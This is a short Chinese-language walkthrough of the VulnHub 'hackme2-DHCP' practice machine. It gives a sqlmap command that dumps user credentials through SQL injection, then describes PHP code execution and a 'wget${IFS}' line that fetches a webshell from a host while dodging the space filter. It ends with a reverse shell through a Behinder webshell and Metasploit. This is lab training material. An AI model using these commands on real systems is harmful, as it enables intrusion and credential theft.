hackDHCP靶場教程

語言: CN / TW / HK

靶場地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova

第一眼就看見了註冊,那麼這個靶場的思路可能就是註冊後的操作,畢竟如果不是,開了這個也沒什麼用

註冊一個使用者,然後登陸,登陸成功,翻譯了一下是個圖書查詢的系統

通過頁面對比,猜測是個注入


跑了一下

sqlmap -r a.txt -vv --tamper=space2comment --dbms  "MySQL" --level 5 -D webapphacking -C "user,pasword" –dump

結果

特殊的使用者

Superadmin

解密後

進來了

超級管理員許可權

進來的頁面有兩個點,一個是檔案上傳,一個是不知道幹什麼的表單提交,思考如下


製作者考的肯定不是上傳點,很明顯上傳點會難一些,地下更不會放一個無用的表單,掛上XRAY,對功能進行打點,找出容易攻擊到的點


Xray掃描入下



可以執行PHP程式碼


嘗試復現


命令執行成功


Wge 下載webshell wget${IFS}http://0.0.0.0//a.php


${IFS}是代替空格的佔位符,上線


上傳指令碼到

發現了一個特殊檔案


切換到互動式,還需要往外彈一下





卡殼

最終解決,上傳冰蠍馬反彈msf 唉,不知道這個靶子為什麼nc 用不了

本文分享自微信公眾號 - 滲透雲筆記(shentouyun)。
如有侵權,請聯絡 [email protected] 刪除。
本文參與“OSC源創計劃”,歡迎正在閱讀的你也加入,一起分享。